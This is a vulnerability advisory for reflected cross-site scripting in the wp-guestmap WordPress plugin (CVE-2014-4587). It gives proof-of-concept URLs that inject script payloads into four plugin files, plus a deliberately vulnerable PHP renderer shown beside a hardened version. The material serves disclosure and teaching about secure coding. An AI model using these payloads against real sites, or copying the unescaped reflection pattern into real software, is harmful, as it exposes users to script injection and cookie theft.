wp-plugin : wp-guestmap – A3-Cross-Site Scripting (XSS)

 

Plugin Details

Plugin Name : wp-guestmap

Affected Version : 1.8 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS) (OWASP Top 10 2013, A3)

Identified by : Anant Shrivastava


Technical Details

Minimum Level of Access Required : Unauthenticated (the affected files are requested directly under wp-content/plugins/, so no WordPress login is involved)

PoC - (Proof of Concept) :

Each parameter value is the payload `<script>alert(document.cookie)</script>`; in the variants below it is prefixed with `'>` so that it first closes the quoted attribute or JavaScript string the value is reflected into.

http://localhost/wp-content/plugins/wp-guestmap/guest-locator.php?zl=<script>alert(document.cookie)</script>&mt=<script>alert(document.cookie)</script>&activate=activate&dc=<script>alert(document.cookie)</script>

http://localhost/wp-content/plugins/wp-guestmap/online-tracker.php?zl=zl'><script>alert(document.cookie)</script>&mt=mt'><script>alert(document.cookie)</script>&activate=activate'><script>alert(document.cookie)</script>&dc=dc'><script>alert(document.cookie)</script>

http://localhost/wp-content/plugins/wp-guestmap/stats-map.php?zl=zl'><script>alert(document.cookie)</script>&mt=mt'><script>alert(document.cookie)</script>&dc=dc'><script>alert(document.cookie)</script>

http://localhost/wp-content/plugins/wp-guestmap/weather-map.php?zl=zl'><script>alert(document.cookie)</script>&mt=mt'><script>alert(document.cookie)</script>&activate=activate'><script>alert(document.cookie)</script>&dc=dc'><script>alert(document.cookie)</script>

Multiple parameters (zl, mt and dc in all four files, plus activate in online-tracker.php and weather-map.php) are reflected into the response without encoding, so the payload executes in the victim's browser as reflected XSS.
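The advisory does not reproduce the plugin's source, so the following PHP is an added illustration and not wp-guestmap's own code. It is a hypothetical widget renderer that reads the same four GET parameters and writes them into generated markup and JavaScript, first in the raw-reflection form the PoC URLs exercise and then in a hardened form. The parameter meanings (zl as zoom level, mt as map type, dc as a free-text display value, activate as an on/off flag) are assumptions made for the example. Plain PHP escaping functions are used because a file requested directly under wp-content/plugins/ does not have WordPress loaded unless it includes wp-load.php itself.

```php
<?php
// Added example, not the wp-guestmap code. Hypothetical renderer that mirrors the
// reflection pattern in the advisory: zl, mt, dc and activate come straight from
// $_GET and are written into the generated HTML/JavaScript.

// --- Vulnerable form: raw reflection (what the PoC URLs exercise) ---
function render_map_vulnerable(array $get): string
{
    $zl       = $get['zl'] ?? '3';         // zoom level (assumed meaning)
    $mt       = $get['mt'] ?? 'roadmap';   // map type (assumed meaning)
    $dc       = $get['dc'] ?? '';          // free-text display value (assumed)
    $activate = $get['activate'] ?? '';    // on/off flag (assumed)

    // Attribute context: a value containing '> closes the attribute and the tag.
    $html  = "<div id='guestmap' data-activate='$activate'>\n";
    $html .= "<script>\n";
    // JavaScript contexts: a bare number and a single-quoted string, both unescaped.
    $html .= "var zoom = $zl;\n";
    $html .= "var mapType = '$mt';\n";
    // innerHTML turns the value into markup, so even a well-quoted string is unsafe.
    $html .= "document.getElementById('dc').innerHTML = '$dc';\n";
    $html .= "</script>\n</div>\n";
    return $html;
}

// --- Hardened form: validate what has a fixed shape, encode the rest per context ---
function render_map_hardened(array $get): string
{
    // Zoom level: integer only, clamped to the range a map widget can use.
    $zl = max(0, min(21, (int) ($get['zl'] ?? 3)));

    // Map type: allow-list; anything else falls back to the default.
    $allowed_types = ['roadmap', 'satellite', 'hybrid', 'terrain'];
    $mt = in_array($get['mt'] ?? '', $allowed_types, true) ? $get['mt'] : 'roadmap';

    // activate: the only meaningful value is the literal word 'activate'.
    $activate = (($get['activate'] ?? '') === 'activate') ? 'activate' : '';

    // dc is genuinely free text, so it is encoded for the exact context it lands in.
    // JSON_HEX_TAG encodes '<' and '>' as \u003C / \u003E, which also stops a
    // "</script>" inside the value from terminating the script block.
    $dc_js = json_encode((string) ($get['dc'] ?? ''),
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);

    // HTML attribute context: htmlspecialchars with ENT_QUOTES encodes both quote styles.
    $html  = "<div id='guestmap' data-activate='"
           . htmlspecialchars($activate, ENT_QUOTES, 'UTF-8') . "'>\n";
    $html .= "<script>\n";
    $html .= "var zoom = " . $zl . ";\n";              // already an int
    $html .= "var mapType = " . json_encode($mt) . ";\n"; // allow-listed string
    // textContent instead of innerHTML: the value is data, never markup.
    $html .= "document.getElementById('dc').textContent = " . $dc_js . ";\n";
    $html .= "</script>\n</div>\n";
    return $html;
}

// Constructed input reproducing the advisory's online-tracker.php PoC query string.
$poc = [
    'zl'       => "zl'><script>alert(document.cookie)</script>",
    'mt'       => "mt'><script>alert(document.cookie)</script>",
    'activate' => "activate'><script>alert(document.cookie)</script>",
    'dc'       => "dc'><script>alert(document.cookie)</script>",
];

echo "--- vulnerable ---\n", render_map_vulnerable($poc);
echo "--- hardened ---\n",   render_map_hardened($poc);
```

Run it with `php example.php` and compare the two outputs: the vulnerable version emits the attacker's `<script>` element four times, once per context; the hardened version emits `zoom = 0`, `mapType = "roadmap"`, an empty `data-activate`, and the dc payload as an inert JavaScript string literal. When the same code runs inside WordPress (that is, after wp-load.php has been included), `absint()`, `esc_attr()`, `esc_js()` and `wp_json_encode()` are the equivalent helpers; the principle is unchanged: allow-list anything with a fixed shape, and encode free text for the specific HTML or JavaScript context it is written into.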

 

Disclosure Timeline

Vendor Contacted : 2014-01-17

Plugin Status : Closed

Public Disclosure : June 12, 2014

CVE Number : CVE-2014-4587

 
Plugin Description :
 
[WP GuestMap in your own language](http://blog.codexpress.cn/wordpress/wp-guestmap-i18n/ "WP GuestMap Internationalization")

If you have some problems with it, please leave a comments [HERE](http://blog.codexpress.cn/php/wordpress-plugin-wp-guestmap/ "WP GuestMap Bug report")

The plugin is a Google Map widget builder; currently three major widgets are supported:

* Guest Locator -- locate and display the current visitor on Google Map
* Online Tracker -- very similar to Guest Locator, except that it also shows other online users
* Stats Map -- collect visitors' geolocation and make clouds on Google Map
* Weather Map -- show weather forecast of specific location on Google Map

It generates HTML code that you can easily copy and paste into a sidebar widget or into posts/pages. (To use it as a widget, go to **Presentation** -> **Widgets**, add a **Text Widget** and paste the code there.)

**Guest Locator**

The simplest widget. Just put in a welcome message (plain text or HTML), and the widget will locate your visitors and welcome them. Macros like %country%, %country_code%, %city%, %latitude% and %longitude% are available.

**Online Tracker**

Almost the same as **Guest Locator**, except that this widget also shows other online users and refreshes every minute. You have two extra tags, %online_user_count% and %online_other_user_count%, besides those in **Guest Locator**.

[DEMO](http://blog.codexpress.cn/ "Online Tracker Demo")

**Stats Map**

This widget must be enabled to take effect. It loads little by little and finally displays all your visitors' location.

[DEMO](http://blog.codexpress.cn/guestmap/ "Stats Map Demo")

*Output Pagesize* is the maximum output count per step (you generally need not change it). *Date of Birth* is a very useful option: only visitors visiting after the birthday will be shown on the Stats Map. *Authentic Key* is a private key, with which you can subscribe to statistics by RSS feed. A public Daily GeoRSS is also available.

[Public GeoRSS on Google Maps](http://maps.google.com/maps?f=q&ie=UTF8&z=2&q=http%3A%2F%2Fblog.codexpress.cn%2Fwp-content%2Fplugins%2Fwp-guestmap%2Ffeed.php%3Fvisual%3Denabled "WP GuestMap Daily GeoRSS")

**Weather Map**

This widget shows a simple weather report on Google Maps. You need to get your Google AJAX Feed API Key (from Google) and the location id (from Yahoo! Weather).


Upgrading & Other Information: please visit [http://blog.codexpress.cn/php/wordpress-plugin-wp-guestmap/](http://blog.codexpress.cn/php/wordpress-plugin-wp-guestmap/ "WP GuestMap Upgrade").
